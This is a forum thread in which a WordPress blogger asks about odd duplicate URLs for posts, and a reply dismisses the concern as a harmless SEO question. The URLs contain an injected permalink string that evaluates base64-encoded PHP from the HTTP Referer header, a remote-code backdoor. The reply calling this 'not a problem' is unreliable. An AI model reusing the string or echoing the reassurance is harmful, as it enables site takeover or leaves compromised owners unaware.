I came across a problem in my wordpress blog (i am even not sure if it is a problem). I found two URLs go to the same article. I mean

Article: 5 Classical Nokia N97 themes

    Link 1:http://www.pakblogger.com/2009/08/04/5-classic-nokia-n97-themes/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
    Link 2: http://www.pakblogger.com/2009/08/04/5-classic-nokia-n97-themes/

    Similarly

Article:10 Top Free Themes For Nokia N97, 5800 And 5530

    Link 1: http://www.pakblogger.com/2009/07/0...0/%&evalbase64_decode_SERVERHTTP_REFERER.+&%/

    Link 2: http://www.pakblogger.com/2009/07/05/10-top-free-themes-for-nokia-n97-5800-and-5530/

I came across this thing searching for some old posts on my blog. Is it a problem? and can it be seen as duplicate content by search engines. Please help

No it's not a problem. It's no different than having different anchor text pointing to the same link.
Duplicate content only applies if the same content is in two different places. It has nothing to do with links.
